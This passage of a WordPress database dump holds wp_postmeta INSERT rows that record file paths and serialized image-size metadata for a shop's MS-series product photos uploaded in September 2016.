INSERT INTO `wp_postmeta` VALUES (17552, 1740, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-153BN.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-153BN-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-153BN-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-153BN-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-153BN-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-153BN-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-153BN-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-153BN-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-153BN-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17553, 1741, '_wp_attached_file', '2016/09/MS-222L.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17554, 1741, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-222L.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-222L-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-222L-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-222L-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-222L-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-222L-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-222L-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-222L-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-222L-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17555, 1742, '_wp_attached_file', '2016/09/MS-222N.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17556, 1742, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-222N.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-222N-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-222N-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-222N-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-222N-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-222N-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-222N-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-222N-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-222N-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17557, 1743, '_wp_attached_file', '2016/09/MS-242L.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17558, 1743, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-242L.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-242L-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-242L-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-242L-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-242L-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-242L-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-242L-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-242L-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-242L-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17559, 1744, '_wp_attached_file', '2016/09/MS-242L-AS.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17560, 1744, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:22:"2016/09/MS-242L-AS.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"MS-242L-AS-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"MS-242L-AS-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"MS-242L-AS-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"MS-242L-AS-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"MS-242L-AS-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"MS-242L-AS-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"MS-242L-AS-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"MS-242L-AS-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17561, 1745, '_wp_attached_file', '2016/09/MS-250.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17562, 1745, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-250.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-250-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-250-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-250-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-250-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-250-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-250-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-250-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-250-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17563, 1746, '_wp_attached_file', '2016/09/MS-255.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17564, 1746, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-255.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-255-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-255-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-255-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-255-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-255-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-255-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-255-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-255-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17565, 1747, '_wp_attached_file', '2016/09/MS-260.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17566, 1747, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-260.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-260-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-260-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-260-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-260-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-260-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-260-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-260-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-260-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17567, 1748, '_wp_attached_file', '2016/09/MS-280.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17568, 1748, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-280.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-280-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-280-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-280-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-280-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-280-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-280-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-280-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-280-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17569, 1749, '_wp_attached_file', '2016/09/MS-452N.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17570, 1749, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-452N.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-452N-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-452N-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-452N-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-452N-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-452N-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-452N-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-452N-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-452N-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17571, 1750, '_wp_attached_file', '2016/09/MS-460H.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17572, 1750, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-460H.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-460H-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-460H-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-460H-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-460H-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-460H-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-460H-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-460H-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-460H-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17573, 1751, '_wp_attached_file', '2016/09/MS-462H.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17574, 1751, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-462H.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-462H-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-462H-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-462H-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-462H-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-462H-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-462H-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-462H-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-462H-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17575, 1752, '_wp_attached_file', '2016/09/MS-465C.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17576, 1752, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-465C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-465C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-465C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-465C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-465C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-465C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-465C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-465C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-465C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17577, 1753, '_wp_attached_file', '2016/09/MS-467C.jpg'); 
